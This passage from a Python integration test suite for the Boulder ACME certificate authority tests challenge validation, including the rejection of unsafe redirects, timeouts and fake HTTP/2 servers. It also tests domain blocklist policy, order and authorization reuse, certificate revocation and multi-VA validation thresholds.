chisel2.expect_problem("urn:ietf:params:acme:error:rateLimited",
lambda: chisel2.auth_and_issue([domain], client=client))
def test_http_challenge_loop_redirect():
client = chisel2.make_client()
# Create an authz for a random domain and get its HTTP-01 challenge token
d, chall = rand_http_chall(client)
token = chall.encode("token")
# Create a HTTP redirect from the challenge's validation path to itself
challengePath = "/.well-known/acme-challenge/{0}".format(token)
challSrv.add_http_redirect(
challengePath,
"http://{0}{1}".format(d, challengePath))
# Issuing for the name should fail because of the challenge domain's
# redirect loop.
chisel2.expect_problem("urn:ietf:params:acme:error:connection",
lambda: chisel2.auth_and_issue([d], client=client, chall_type="http-01"))
challSrv.remove_http_redirect(challengePath)
def test_http_challenge_badport_redirect():
client = chisel2.make_client()
# Create an authz for a random domain and get its HTTP-01 challenge token
d, chall = rand_http_chall(client)
token = chall.encode("token")
# Create a HTTP redirect from the challenge's validation path to a host with
# an invalid port.
challengePath = "/.well-known/acme-challenge/{0}".format(token)
challSrv.add_http_redirect(
challengePath,
"http://{0}:1337{1}".format(d, challengePath))
# Issuing for the name should fail because of the challenge domain's
# invalid port redirect.
chisel2.expect_problem("urn:ietf:params:acme:error:connection",
lambda: chisel2.auth_and_issue([d], client=client, chall_type="http-01"))
challSrv.remove_http_redirect(challengePath)
def test_http_challenge_badhost_redirect():
client = chisel2.make_client()
# Create an authz for a random domain and get its HTTP-01 challenge token
d, chall = rand_http_chall(client)
token = chall.encode("token")
# Create a HTTP redirect from the challenge's validation path to a bare IP
# hostname.
challengePath = "/.well-known/acme-challenge/{0}".format(token)
challSrv.add_http_redirect(
challengePath,
"https://127.0.0.1{0}".format(challengePath))
# Issuing for the name should cause a connection error because the redirect
# domain name is an IP address.
chisel2.expect_problem("urn:ietf:params:acme:error:connection",
lambda: chisel2.auth_and_issue([d], client=client, chall_type="http-01"))
challSrv.remove_http_redirect(challengePath)
def test_http_challenge_badproto_redirect():
client = chisel2.make_client()
# Create an authz for a random domain and get its HTTP-01 challenge token
d, chall = rand_http_chall(client)
token = chall.encode("token")
# Create a HTTP redirect from the challenge's validation path to a
# non-HTTP/HTTPS protocol URL.
challengePath = "/.well-known/acme-challenge/{0}".format(token)
challSrv.add_http_redirect(
challengePath,
"gopher://{0}{1}".format(d, challengePath))
# Issuing for the name should cause a connection error because the redirect
# uses a non-HTTP/HTTPS protocol.
chisel2.expect_problem("urn:ietf:params:acme:error:connection",
lambda: chisel2.auth_and_issue([d], client=client, chall_type="http-01"))
challSrv.remove_http_redirect(challengePath)
def test_http_challenge_http_redirect():
client = chisel2.make_client()
# Create an authz for a random domain and get its HTTP-01 challenge token
d, chall = rand_http_chall(client)
token = chall.encode("token")
# Calculate its keyauth so we can add it in a special non-standard location
# for the redirect result
resp = chall.response(client.net.key)
keyauth = resp.key_authorization
challSrv.add_http01_response("http-redirect", keyauth)
# Create a HTTP redirect from the challenge's validation path to some other
# token path where we have registered the key authorization.
challengePath = "/.well-known/acme-challenge/{0}".format(token)
redirectPath = "/.well-known/acme-challenge/http-redirect?params=are&important=to¬=lose"
challSrv.add_http_redirect(
challengePath,
"http://{0}{1}".format(d, redirectPath))
chisel2.auth_and_issue([d], client=client, chall_type="http-01")
challSrv.remove_http_redirect(challengePath)
challSrv.remove_http01_response("http-redirect")
history = challSrv.http_request_history(d)
challSrv.clear_http_request_history(d)
# There should have been at least two GET requests made to the
# challtestsrv. There may have been more if remote VAs were configured.
if len(history) < 2:
raise(Exception("Expected at least 2 HTTP request events on challtestsrv, found {1}".format(len(history))))
initialRequests = []
redirectedRequests = []
for request in history:
# All requests should have been over HTTP
if request['HTTPS'] is True:
raise(Exception("Expected all requests to be HTTP"))
# Initial requests should have the expected initial HTTP-01 URL for the challenge
if request['URL'] == challengePath:
initialRequests.append(request)
# Redirected requests should have the expected redirect path URL with all
# its parameters
elif request['URL'] == redirectPath:
redirectedRequests.append(request)
else:
raise(Exception("Unexpected request URL {0} in challtestsrv history: {1}".format(request['URL'], request)))
# There should have been at least 1 initial HTTP-01 validation request.
if len(initialRequests) < 1:
raise(Exception("Expected {0} initial HTTP-01 request events on challtestsrv, found {1}".format(validation_attempts, len(initialRequests))))
# There should have been at least 1 redirected HTTP request for each VA
if len(redirectedRequests) < 1:
raise(Exception("Expected {0} redirected HTTP-01 request events on challtestsrv, found {1}".format(validation_attempts, len(redirectedRequests))))
def test_http_challenge_https_redirect():
client = chisel2.make_client()
# Create an authz for a random domain and get its HTTP-01 challenge token
d, chall = rand_http_chall(client)
token = chall.encode("token")
# Calculate its keyauth so we can add it in a special non-standard location
# for the redirect result
resp = chall.response(client.net.key)
keyauth = resp.key_authorization
challSrv.add_http01_response("https-redirect", keyauth)
# Create a HTTP redirect from the challenge's validation path to an HTTPS
# path with some parameters
challengePath = "/.well-known/acme-challenge/{0}".format(token)
redirectPath = "/.well-known/acme-challenge/https-redirect?params=are&important=to¬=lose"
challSrv.add_http_redirect(
challengePath,
"https://{0}{1}".format(d, redirectPath))
# Also add an A record for the domain pointing to the interface that the
# HTTPS HTTP-01 challtestsrv is bound to.
challSrv.add_a_record(d, ["10.77.77.77"])
try:
chisel2.auth_and_issue([d], client=client, chall_type="http-01")
except errors.ValidationError as e:
problems = []
for authzr in e.failed_authzrs:
for chall in authzr.body.challenges:
error = chall.error
if error:
problems.append(error.__str__())
raise(Exception("validation problem: %s" % "; ".join(problems)))
challSrv.remove_http_redirect(challengePath)
challSrv.remove_a_record(d)
history = challSrv.http_request_history(d)
challSrv.clear_http_request_history(d)
# There should have been at least two GET requests made to the challtestsrv by the VA
if len(history) < 2:
raise(Exception("Expected 2 HTTP request events on challtestsrv, found {0}".format(len(history))))
initialRequests = []
redirectedRequests = []
for request in history:
# Initial requests should have the expected initial HTTP-01 URL for the challenge
if request['URL'] == challengePath:
initialRequests.append(request)
# Redirected requests should have the expected redirect path URL with all
# its parameters
elif request['URL'] == redirectPath:
redirectedRequests.append(request)
else:
raise(Exception("Unexpected request URL {0} in challtestsrv history: {1}".format(request['URL'], request)))
# There should have been at least 1 initial HTTP-01 validation request.
if len(initialRequests) < 1:
raise(Exception("Expected {0} initial HTTP-01 request events on challtestsrv, found {1}".format(validation_attempts, len(initialRequests))))
# All initial requests should have been over HTTP
for r in initialRequests:
if r['HTTPS'] is True:
raise(Exception("Expected all initial requests to be HTTP, got %s" % r))
# There should have been at least 1 redirected HTTP request for each VA
if len(redirectedRequests) < 1:
raise(Exception("Expected {0} redirected HTTP-01 request events on challtestsrv, found {1}".format(validation_attempts, len(redirectedRequests))))
# All the redirected requests should have been over HTTPS with the correct
# SNI value
for r in redirectedRequests:
if r['HTTPS'] is False:
raise(Exception("Expected all redirected requests to be HTTPS"))
# TODO(@cpu): The following ServerName test will fail with config-next
# until https://github.com/letsencrypt/boulder/issues/3969 is fixed.
if CONFIG_NEXT:
return
elif r['ServerName'] != d:
raise(Exception("Expected all redirected requests to have ServerName {0} got \"{1}\"".format(d, r['ServerName'])))
class SlowHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
try:
# Sleeptime needs to be larger than the RA->VA timeout (20s at the
# time of writing)
sleeptime = 22
print("SlowHTTPRequestHandler: sleeping for {0}s\n".format(sleeptime))
time.sleep(sleeptime)
self.send_response(200)
self.end_headers()
self.wfile.write(b"this is not an ACME key authorization")
except:
pass
class SlowHTTPServer(HTTPServer):
# Override handle_error so we don't print a misleading stack trace when the
# VA terminates the connection due to timeout.
def handle_error(self, request, client_address):
pass
def test_http_challenge_timeout():
"""
test_http_challenge_timeout tests that the VA times out challenge requests
to a slow HTTP server appropriately.
"""
# Start a simple python HTTP server on port 5002 in its own thread.
# NOTE(@cpu): The pebble-challtestsrv binds 10.77.77.77:5002 for HTTP-01
# challenges so we must use the 10.88.88.88 address for the throw away
# server for this test and add a mock DNS entry that directs the VA to it.
httpd = SlowHTTPServer(("10.88.88.88", 5002), SlowHTTPRequestHandler)
thread = threading.Thread(target = httpd.serve_forever)
thread.daemon = False
thread.start()
# Pick a random domain
hostname = random_domain()
# Add A record for the domains to ensure the VA's requests are directed
# to the interface that we bound the HTTPServer to.
challSrv.add_a_record(hostname, ["10.88.88.88"])
start = datetime.datetime.utcnow()
end = 0
try:
# We expect a connection timeout error to occur
chisel2.expect_problem("urn:ietf:params:acme:error:connection",
lambda: chisel2.auth_and_issue([hostname], chall_type="http-01"))
end = datetime.datetime.utcnow()
finally:
# Shut down the HTTP server gracefully and join on its thread.
httpd.shutdown()
httpd.server_close()
thread.join()
delta = end - start
# Expected duration should be the RA->VA timeout plus some padding (At
# present the timeout is 20s so adding 2s of padding = 22s)
expectedDuration = 22
if delta.total_seconds() == 0 or delta.total_seconds() > expectedDuration:
raise(Exception("expected timeout to occur in under {0} seconds. Took {1}".format(expectedDuration, delta.total_seconds())))
def test_tls_alpn_challenge():
# Pick two random domains
domains = [random_domain(),random_domain()]
# Add A records for these domains to ensure the VA's requests are directed
# to the interface that the challtestsrv has bound for TLS-ALPN-01 challenge
# responses
for host in domains:
challSrv.add_a_record(host, ["10.88.88.88"])
chisel2.auth_and_issue(domains, chall_type="tls-alpn-01")
for host in domains:
challSrv.remove_a_record(host)
def test_overlapping_wildcard():
"""
Test issuance for a random domain and a wildcard version of the same domain
using DNS-01. This should result in *two* distinct authorizations.
"""
domain = random_domain()
domains = [ domain, "*."+domain ]
client = chisel2.make_client(None)
csr_pem = chisel2.make_csr(domains)
order = client.new_order(csr_pem)
authzs = order.authorizations
if len(authzs) != 2:
raise(Exception("order for %s had %d authorizations, expected 2" %
(domains, len(authzs))))
cleanup = chisel2.do_dns_challenges(client, authzs)
try:
order = client.poll_and_finalize(order)
finally:
cleanup()
def test_highrisk_blocklist():
"""
Test issuance for a subdomain of a HighRiskBlockedNames entry. It should
fail with a policy error.
"""
# We include "example.org" in `test/hostname-policy.yaml` in the
# HighRiskBlockedNames list so issuing for "foo.example.org" should be
# blocked.
domain = "foo.example.org"
# We expect this to produce a policy problem
chisel2.expect_problem("urn:ietf:params:acme:error:rejectedIdentifier",
lambda: chisel2.auth_and_issue([domain], chall_type="dns-01"))
def test_wildcard_exactblacklist():
"""
Test issuance for a wildcard that would cover an exact blacklist entry. It
should fail with a policy error.
"""
# We include "highrisk.le-test.hoffman-andrews.com" in `test/hostname-policy.yaml`
# Issuing for "*.le-test.hoffman-andrews.com" should be blocked
domain = "*.le-test.hoffman-andrews.com"
# We expect this to produce a policy problem
chisel2.expect_problem("urn:ietf:params:acme:error:rejectedIdentifier",
lambda: chisel2.auth_and_issue([domain], chall_type="dns-01"))
def test_wildcard_authz_reuse():
"""
Test that an authorization for a base domain obtained via HTTP-01 isn't
reused when issuing a wildcard for that base domain later on.
"""
# Create one client to reuse across multiple issuances
client = chisel2.make_client(None)
# Pick a random domain to issue for
domains = [ random_domain() ]
csr_pem = chisel2.make_csr(domains)
# Submit an order for the name
order = client.new_order(csr_pem)
# Complete the order via an HTTP-01 challenge
cleanup = chisel2.do_http_challenges(client, order.authorizations)
try:
order = client.poll_and_finalize(order)
finally:
cleanup()
# Now try to issue a wildcard for the random domain
domains[0] = "*." + domains[0]
csr_pem = chisel2.make_csr(domains)
order = client.new_order(csr_pem)
# We expect all of the returned authorizations to be pending status
for authz in order.authorizations:
if authz.body.status != Status("pending"):
raise(Exception("order for %s included a non-pending authorization (status: %s) from a previous HTTP-01 order" %
((domains), str(authz.body.status))))
def test_bad_overlap_wildcard():
chisel2.expect_problem("urn:ietf:params:acme:error:malformed",
lambda: chisel2.auth_and_issue(["*.example.com", "www.example.com"]))
def test_duplicate_orders():
"""
Test that the same client issuing for the same domain names twice in a row
works without error.
"""
client = chisel2.make_client(None)
domains = [ random_domain() ]
chisel2.auth_and_issue(domains, client=client)
chisel2.auth_and_issue(domains, client=client)
def test_order_reuse_failed_authz():
"""
Test that creating an order for a domain name, failing an authorization in
that order, and submitting another new order request for the same name
doesn't reuse a failed authorizaton in the new order.
"""
client = chisel2.make_client(None)
domains = [ random_domain() ]
csr_pem = chisel2.make_csr(domains)
order = client.new_order(csr_pem)
firstOrderURI = order.uri
# Pick the first authz's first challenge, doesn't matter what type it is
chall_body = order.authorizations[0].body.challenges[0]
# Answer it, but with nothing set up to solve the challenge request
client.answer_challenge(chall_body, chall_body.response(client.net.key))
deadline = datetime.datetime.now() + datetime.timedelta(seconds=60)
authzFailed = False
try:
# Poll the order's authorizations until they are non-pending, a timeout
# occurs, or there is an invalid authorization status.
client.poll_authorizations(order, deadline)
except acme_errors.ValidationError as e:
# We expect there to be a ValidationError from one of the authorizations
# being invalid.
authzFailed = True
# If the poll ended and an authz's status isn't invalid then we reached the
# deadline, fail the test
if not authzFailed:
raise(Exception("timed out waiting for order %s to become invalid" % firstOrderURI))
# Make another order with the same domains
order = client.new_order(csr_pem)
# It should not be the same order as before
if order.uri == firstOrderURI:
raise(Exception("new-order for %s returned a , now-invalid, order" % domains))
# We expect all of the returned authorizations to be pending status
for authz in order.authorizations:
if authz.body.status != Status("pending"):
raise(Exception("order for %s included a non-pending authorization (status: %s) from a previous order" %
((domains), str(authz.body.status))))
# We expect the new order can be fulfilled
cleanup = chisel2.do_http_challenges(client, order.authorizations)
try:
order = client.poll_and_finalize(order)
finally:
cleanup()
def test_order_finalize_early():
"""
    Test that finalizing an order before it's fully authorized results in an
    orderNotReady error.
"""
# Create a client
client = chisel2.make_client(None)
# Create a random domain and a csr
domains = [ random_domain() ]
csr_pem = chisel2.make_csr(domains)
# Create an order for the domain
order = client.new_order(csr_pem)
deadline = datetime.datetime.now() + datetime.timedelta(seconds=5)
# Finalizing an order early should generate an orderNotReady error.
chisel2.expect_problem("urn:ietf:params:acme:error:orderNotReady",
lambda: client.finalize_order(order, deadline))
def test_revoke_by_account():
client = chisel2.make_client()
cert_file = temppath('test_revoke_by_account.pem')
order = chisel2.auth_and_issue([random_domain()], client=client, cert_output=cert_file.name)
cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, order.fullchain_pem)
reset_akamai_purges()
client.revoke(josepy.ComparableX509(cert), 0)
verify_ocsp(cert_file.name, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002", "revoked")
verify_akamai_purge()
def test_revoke_by_issuer():
client = chisel2.make_client(None)
cert_file = temppath('test_revoke_by_issuer.pem')
order = chisel2.auth_and_issue([random_domain()], client=client, cert_output=cert_file.name)
cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, order.fullchain_pem)
reset_akamai_purges()
client.revoke(josepy.ComparableX509(cert), 0)
verify_ocsp(cert_file.name, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002", "revoked")
verify_akamai_purge()
def test_revoke_by_authz():
domains = [random_domain()]
cert_file = temppath('test_revoke_by_authz.pem')
order = chisel2.auth_and_issue(domains, cert_output=cert_file.name)
cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, order.fullchain_pem)
# create a new client and re-authz
client = chisel2.make_client(None)
chisel2.auth_and_issue(domains, client=client)
reset_akamai_purges()
client.revoke(josepy.ComparableX509(cert), 0)
verify_ocsp(cert_file.name, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002", "revoked")
verify_akamai_purge()
def test_revoke_by_privkey():
client = chisel2.make_client(None)
domains = [random_domain()]
key = OpenSSL.crypto.PKey()
key.generate_key(OpenSSL.crypto.TYPE_RSA, 2048)
key_pem = OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, key)
csr_pem = chisel2.make_csr(domains)
order = client.new_order(csr_pem)
cleanup = chisel2.do_http_challenges(client, order.authorizations)
try:
order = client.poll_and_finalize(order)
finally:
cleanup()
# Create a new client with the JWK as the cert private key
jwk = josepy.JWKRSA(key=key)
net = acme_client.ClientNetwork(key, user_agent="Boulder integration tester")
directory = Directory.from_json(net.get(chisel2.DIRECTORY_V2).json())
new_client = acme_client.ClientV2(directory, net)
cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, order.fullchain_pem)
reset_akamai_purges()
client.revoke(josepy.ComparableX509(cert), 0)
cert_file = tempfile.NamedTemporaryFile(
dir=tempdir, suffix='.test_revoke_by_privkey.pem',
mode='w+', delete=False)
cert_file.write(OpenSSL.crypto.dump_certificate(
OpenSSL.crypto.FILETYPE_PEM, cert).decode())
cert_file.close()
verify_ocsp(cert_file.name, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002", "revoked")
verify_akamai_purge()
def test_sct_embedding():
order = chisel2.auth_and_issue([random_domain()])
print(order.fullchain_pem.encode())
cert = parse_cert(order)
# make sure there is no poison extension
try:
cert.extensions.get_extension_for_oid(x509.ObjectIdentifier("1.3.6.1.4.1.11129.2.4.3"))
raise(Exception("certificate contains CT poison extension"))
except x509.ExtensionNotFound:
# do nothing
pass
# make sure there is a SCT list extension
try:
sctList = cert.extensions.get_extension_for_oid(x509.ObjectIdentifier("1.3.6.1.4.1.11129.2.4.2"))
except x509.ExtensionNotFound:
raise(Exception("certificate doesn't contain SCT list extension"))
if len(sctList.value) != 2:
raise(Exception("SCT list contains wrong number of SCTs"))
for sct in sctList.value:
if sct.version != x509.certificate_transparency.Version.v1:
raise(Exception("SCT contains wrong version"))
if sct.entry_type != x509.certificate_transparency.LogEntryType.PRE_CERTIFICATE:
raise(Exception("SCT contains wrong entry type"))
def test_only_return_existing_reg():
client = chisel2.uninitialized_client()
email = "test@not-example.com"
client.new_account(messages.NewRegistration.from_data(email=email,
terms_of_service_agreed=True))
client = chisel2.uninitialized_client(key=client.net.key)
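    # client.net.post() serializes its payload by calling json_dumps() on it,
    # so we wrap a plain dict in a subclass that provides that method. This
    # lets us POST arbitrary newAccount fields (like "onlyReturnExisting")
    # that the upstream messages types don't expose directly.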
class extendedAcct(dict):
def json_dumps(self, indent=None):
return json.dumps(self)
acct = extendedAcct({
"termsOfServiceAgreed": True,
"contact": [email],
"onlyReturnExisting": True
})
resp = client.net.post(client.directory['newAccount'], acct, acme_version=2)
if resp.status_code != 200:
raise(Exception("incorrect response returned for onlyReturnExisting"))
other_client = chisel2.uninitialized_client()
newAcct = extendedAcct({
"termsOfServiceAgreed": True,
"contact": [email],
"onlyReturnExisting": True
})
chisel2.expect_problem("urn:ietf:params:acme:error:accountDoesNotExist",
lambda: other_client.net.post(other_client.directory['newAccount'], newAcct, acme_version=2))
def BouncerHTTPRequestHandler(redirect, guestlist):
"""
BouncerHTTPRequestHandler returns a BouncerHandler class that acts like
a club bouncer in front of another server. The bouncer will respond to
GET requests by looking up the allowed number of requests in the guestlist
for the User-Agent making the request. If there is at least one guestlist
    spot for that UA, the request will be redirected to the real server and the
    guestlist will be decremented. Once the guestlist spots for a UA are
    expended, requests will get a bogus result and have to stand outside in the
    cold.
"""
class BouncerHandler(BaseHTTPRequestHandler):
def __init__(self, *args, **kwargs):
BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def do_HEAD(self):
# This is used by wait_for_server
self.send_response(200)
self.end_headers()
def do_GET(self):
ua = self.headers['User-Agent']
guestlistAllows = BouncerHandler.guestlist.get(ua, 0)
# If there is still space on the guestlist for this UA then redirect
# the request and decrement the guestlist.
if guestlistAllows > 0:
BouncerHandler.guestlist[ua] -= 1
self.log_message("BouncerHandler UA {0} is on the Guestlist. {1} requests remaining.".format(ua, BouncerHandler.guestlist[ua]))
self.send_response(302)
self.send_header("Location", BouncerHandler.redirect)
self.end_headers()
# Otherwise return a bogus result
else:
self.log_message("BouncerHandler UA {0} has no requests on the Guestlist. Sending request to the curb".format(ua))
self.send_response(200)
self.end_headers()
self.wfile.write(u"(• ◡ •) <( VIPs only! )".encode())
BouncerHandler.guestlist = guestlist
BouncerHandler.redirect = redirect
return BouncerHandler
def wait_for_server(addr):
while True:
try:
# NOTE(@cpu): Using HEAD here instead of GET because the
# BouncerHandler modifies its state for GET requests.
status = requests.head(addr).status_code
if status == 200:
return
except requests.exceptions.ConnectionError:
pass
time.sleep(0.5)
def multiva_setup(client, guestlist):
"""
Setup a testing domain and backing multiva server setup. This will block
until the server is ready. The returned cleanup function should be used to
    stop the server. Requests from User-Agents with spots remaining on the
    guestlist will be sent to the real challtestsrv for a good answer; the rest
    will get a bad answer. The domain name is randomly chosen with random_domain().
"""
hostname = random_domain()
csr_pem = chisel2.make_csr([hostname])
order = client.new_order(csr_pem)
authz = order.authorizations[0]
chall = None
for c in authz.body.challenges:
if isinstance(c.chall, challenges.HTTP01):
chall = c.chall
if chall is None:
raise(Exception("No HTTP-01 challenge found for random domain authz"))
token = chall.encode("token")
# Calculate the challenge's keyauth so we can add a good keyauth response on
# the real challtestsrv that we redirect VIP requests to.
resp = chall.response(client.net.key)
keyauth = resp.key_authorization
challSrv.add_http01_response(token, keyauth)
# Add an A record for the domains to ensure the VA's requests are directed
# to the interface that we bound the HTTPServer to.
challSrv.add_a_record(hostname, ["10.88.88.88"])
# Add an A record for the redirect target that sends it to the real chall
# test srv for a valid HTTP-01 response.
redirHostname = "pebble-challtestsrv.example.com"
challSrv.add_a_record(redirHostname, ["10.77.77.77"])
# Start a simple python HTTP server on port 5002 in its own thread.
# NOTE(@cpu): The pebble-challtestsrv binds 10.77.77.77:5002 for HTTP-01
# challenges so we must use the 10.88.88.88 address for the throw away
# server for this test and add a mock DNS entry that directs the VA to it.
redirect = "http://{0}/.well-known/acme-challenge/{1}".format(
redirHostname, token)
httpd = HTTPServer(("10.88.88.88", 5002), BouncerHTTPRequestHandler(redirect, guestlist))
thread = threading.Thread(target = httpd.serve_forever)
thread.daemon = False
thread.start()
def cleanup():
# Remove the challtestsrv mocks
challSrv.remove_a_record(hostname)
challSrv.remove_a_record(redirHostname)
challSrv.remove_http01_response(token)
# Shut down the HTTP server gracefully and join on its thread.
httpd.shutdown()
httpd.server_close()
thread.join()
return hostname, cleanup
def test_http_multiva_threshold_pass():
client = chisel2.make_client()
# Configure a guestlist that will pass the multiVA threshold test by
# allowing the primary VA and one remote.
guestlist = {"boulder": 1, "boulder-remote-b": 1}
hostname, cleanup = multiva_setup(client, guestlist)
try:
# With the maximum number of allowed remote VA failures the overall
# challenge should still succeed.
chisel2.auth_and_issue([hostname], client=client, chall_type="http-01")
finally:
cleanup()
def test_http_multiva_primary_fail_remote_pass():
client = chisel2.make_client()
# Configure a guestlist that will fail the primary VA check but allow the
# remote VAs
guestlist = {"boulder": 0, "boulder-remote-a": 1, "boulder-remote-b": 1}
hostname, cleanup = multiva_setup(client, guestlist)
foundException = False
try:
# The overall validation should fail even if the remotes are allowed
# because the primary VA result cannot be overridden.
chisel2.auth_and_issue([hostname], client=client, chall_type="http-01")
except acme_errors.ValidationError as e:
# NOTE(@cpu): Chisel2's expect_problem doesn't work in this case so this
# test needs to unpack an `acme_errors.ValidationError` on its own. It
# might be possible to clean this up in the future.
if len(e.failed_authzrs) != 1:
raise(Exception("expected one failed authz, found {0}".format(len(e.failed_authzrs))))
challs = e.failed_authzrs[0].body.challenges
httpChall = None
for chall_body in challs:
if isinstance(chall_body.chall, challenges.HTTP01):
httpChall = chall_body
if httpChall is None:
raise(Exception("no HTTP-01 challenge in failed authz"))
if httpChall.error.typ != "urn:ietf:params:acme:error:unauthorized":
raise(Exception("expected unauthorized prob, found {0}".format(httpChall.error.typ)))
foundException = True
finally:
cleanup()
if foundException is False:
raise(Exception("Overall validation did not fail"))
def test_http_multiva_threshold_fail():
client = chisel2.make_client()
# Configure a guestlist that will fail the multiVA threshold test by
# only allowing the primary VA.
guestlist = {"boulder": 1}
hostname, cleanup = multiva_setup(client, guestlist)
failed_authzrs = []
try:
chisel2.auth_and_issue([hostname], client=client, chall_type="http-01")
except acme_errors.ValidationError as e:
# NOTE(@cpu): Chisel2's expect_problem doesn't work in this case so this
# test needs to unpack an `acme_errors.ValidationError` on its own. It
# might be possible to clean this up in the future.
failed_authzrs = e.failed_authzrs
finally:
cleanup()
if len(failed_authzrs) != 1:
raise(Exception("expected one failed authz, found {0}".format(len(failed_authzrs))))
challs = failed_authzrs[0].body.challenges
httpChall = None
for chall_body in challs:
if isinstance(chall_body.chall, challenges.HTTP01):
httpChall = chall_body
if httpChall is None:
raise(Exception("no HTTP-01 challenge in failed authz"))
if httpChall.error.typ != "urn:ietf:params:acme:error:unauthorized":
raise(Exception("expected unauthorized prob, found {0}".format(httpChall.error.typ)))
if not httpChall.error.detail.startswith("During secondary validation: "):
raise(Exception("expected 'During secondary validation' problem detail, found {0}".format(httpChall.error.detail)))
class FakeH2ServerHandler(socketserver.BaseRequestHandler):
"""
FakeH2ServerHandler is a TCP socket handler that writes data representing an
initial HTTP/2 SETTINGS frame as a response to all received data.
"""
def handle(self):
# Read whatever the HTTP request was so that the response isn't seen as
# unsolicited.
self.data = self.request.recv(1024).strip()
# Blast some HTTP/2 bytes onto the socket
        # Truncated example data taken from the community forum:
# https://community.letsencrypt.org/t/le-validation-error-if-server-is-in-google-infrastructure/51841
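        # Rough decode of the bytes below (per RFC 7540's frame layout): a
        # 3-byte length (0x000012), 1-byte type (0x4 = SETTINGS), 1-byte flags
        # (0), and a 4-byte stream ID (0), followed by a truncated settings
        # payload beginning with SETTINGS_MAX_CONCURRENT_STREAMS (0x3) = 128.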
self.request.sendall(b"\x00\x00\x12\x04\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x80\x00")
def wait_for_tcp_server(addr, port):
"""
wait_for_tcp_server attempts to make a TCP connection to the given
address/port every 0.5s until it succeeds.
"""
while True:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((addr, port))
sock.sendall(b"\n")
return
except socket.error:
time.sleep(0.5)
pass
def test_http2_http01_challenge():
"""
test_http2_http01_challenge tests that an HTTP-01 challenge made to a HTTP/2
server fails with a specific error message for this case.
"""
client = chisel2.make_client()
hostname = "fake.h2.example.com"
# Add an A record for the test server to ensure the VA's requests are directed
# to the interface that we bind the FakeH2ServerHandler to.
challSrv.add_a_record(hostname, ["10.88.88.88"])
# Allow socket address reuse on the base TCPServer class. Failing to do this
# causes subsequent integration tests to fail with "Address in use" errors even
# though this test _does_ call shutdown() and server_close(). Even though the
# server was shut-down Python's socket will be in TIME_WAIT because of prev. client
# connections. Having the TCPServer set SO_REUSEADDR on the socket solves
# the problem.
socketserver.TCPServer.allow_reuse_address = True
# Create, start, and wait for a fake HTTP/2 server.
server = socketserver.TCPServer(("10.88.88.88", 5002), FakeH2ServerHandler)
thread = threading.Thread(target = server.serve_forever)
thread.daemon = False
thread.start()
wait_for_tcp_server("10.88.88.88", 5002)
# Issuing an HTTP-01 challenge for this hostname should produce a connection
# problem with an error specific to the HTTP/2 misconfiguration.
expectedError = "Server is speaking HTTP/2 over HTTP"
try:
chisel2.auth_and_issue([hostname], client=client, chall_type="http-01")
except acme_errors.ValidationError as e:
for authzr in e.failed_authzrs:
c = chisel2.get_chall(authzr, challenges.HTTP01)
error = c.error
if error is None or error.typ != "urn:ietf:params:acme:error:connection":
raise(Exception("Expected connection prob, got %s" % (error.__str__())))
if not error.detail.endswith(expectedError):
raise(Exception("Expected prob detail ending in %s, got %s" % (expectedError, error.detail)))
finally:
server.shutdown()
server.server_close()
thread.join()
def test_new_order_policy_errs():
"""
Test that creating an order with policy blocked identifiers returns
a problem with subproblems.
"""
client = chisel2.make_client(None)
# 'in-addr.arpa' is present in `test/hostname-policy.yaml`'s
# HighRiskBlockedNames list.
csr_pem = chisel2.make_csr(["out-addr.in-addr.arpa", "between-addr.in-addr.arpa"])
# With two policy blocked names in the order we expect to get back a top
# level rejectedIdentifier with a detail message that references
# subproblems.
#
# TODO(@cpu): After https://github.com/certbot/certbot/issues/7046 is
# implemented in the upstream `acme` module this test should also ensure the
# subproblems are properly represented.
ok = False
try:
order = client.new_order(csr_pem)
except messages.Error as e:
ok = True
if e.typ != "urn:ietf:params:acme:error:rejectedIdentifier":
raise(Exception("Expected rejectedIdentifier type problem, got {0}".format(e.typ)))
if e.detail != 'Error creating new order :: Cannot issue for "between-addr.in-addr.arpa": The ACME server refuses to issue a certificate for this domain name, because it is forbidden by policy (and 1 more problems. Refer to sub-problems for more information.)':
raise(Exception("Order problem detail did not match expected"))
if not ok:
raise(Exception("Expected problem, got no error"))
def test_long_san_no_cn():
try:
chisel2.auth_and_issue(["".join(random.choice(string.ascii_uppercase) for x in range(61)) + ".com"])
        # if we get here, the auth_and_issue call didn't fail, so fail the test
raise(Exception("Issuance didn't fail when the only SAN in a certificate was longer than the max CN length"))
except messages.Error as e:
if e.typ != "urn:ietf:params:acme:error:badCSR":
raise(Exception("Expected malformed type problem, got {0}".format(e.typ)))
if e.detail != "Error finalizing order :: CSR doesn't contain a SAN short enough to fit in CN":
raise(Exception("Problem detail did not match expected"))
def test_delete_unused_challenges():
order = chisel2.auth_and_issue([random_domain()], chall_type="dns-01")
a = order.authorizations[0]
if len(a.body.challenges) != 1:
raise(Exception("too many challenges (%d) left after validation" % len(a.body.challenges)))
if not isinstance(a.body.challenges[0].chall, challenges.DNS01):
raise(Exception("wrong challenge type left after validation"))
# intentionally fail a challenge
client = chisel2.make_client()
csr_pem = chisel2.make_csr([random_domain()])
order = client.new_order(csr_pem)
c = chisel2.get_chall(order.authorizations[0], challenges.DNS01)
client.answer_challenge(c, c.response(client.net.key))
for _ in range(5):
a, _ = client.poll(order.authorizations[0])
if a.body.status == Status("invalid"):
break
time.sleep(1)
if len(a.body.challenges) != 1:
raise(Exception("too many challenges (%d) left after failed validation" %
len(a.body.challenges)))
if not isinstance(a.body.challenges[0].chall, challenges.DNS01):
raise(Exception("wrong challenge type left after validation"))
def test_auth_deactivation_v2():
client = chisel2.make_client(None)
csr_pem = chisel2.make_csr([random_domain()])
order = client.new_order(csr_pem)
resp = client.deactivate_authorization(order.authorizations[0])
